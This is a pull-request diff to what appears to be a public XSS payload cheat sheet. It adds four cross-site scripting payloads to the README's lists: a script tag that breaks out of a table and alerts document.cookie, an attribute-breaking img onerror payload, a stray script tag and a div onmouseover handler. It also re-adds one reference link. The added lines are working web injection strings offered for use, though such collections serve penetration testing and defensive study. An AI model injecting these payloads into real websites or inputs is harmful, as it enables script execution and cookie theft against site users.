Merge 2cd316fdd9 into 64b36854a7

XSS Injection/README.md

@@ -187,6 +187,7 @@ Most tools are also suitable for blind XSS attacks:
 <script>eval('\x61lert(\'33\')')</script>
 <script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
 <object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
+</td></tr><script>alert(document.cookie);alert(2)</script><td><tr>
 
 // Img payload
 <img src=x onerror=alert('XSS');>
@@ -197,6 +198,7 @@ Most tools are also suitable for blind XSS attacks:
 "><img src=x onerror=alert('XSS');>
 "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
 <><img src=1 onerror=alert(1)>
+"><img src=# onerror=alert("1")>/#
 
 // Svg payload
 <svgonload=alert(1)>
@@ -218,6 +220,8 @@ Most tools are also suitable for blind XSS attacks:
 <div onpointermove="alert(45)">MOVE HERE</div>
 <div onpointerout="alert(45)">MOVE HERE</div>
 <div onpointerup="alert(45)">MOVE HERE</div>
+</div></font><script>hello</script>
+<div onmouseover="alert('XSS')">test</div>
 ```
 
 ### XSS using HTML5 tags
@@ -616,4 +620,4 @@ Technical blogposts available at
 - [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html)
 - [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](http://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
 - [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://klikki.fi/adv/yahoo.html)
-- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)
+- [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://klikki.fi/adv/yahoo2.html)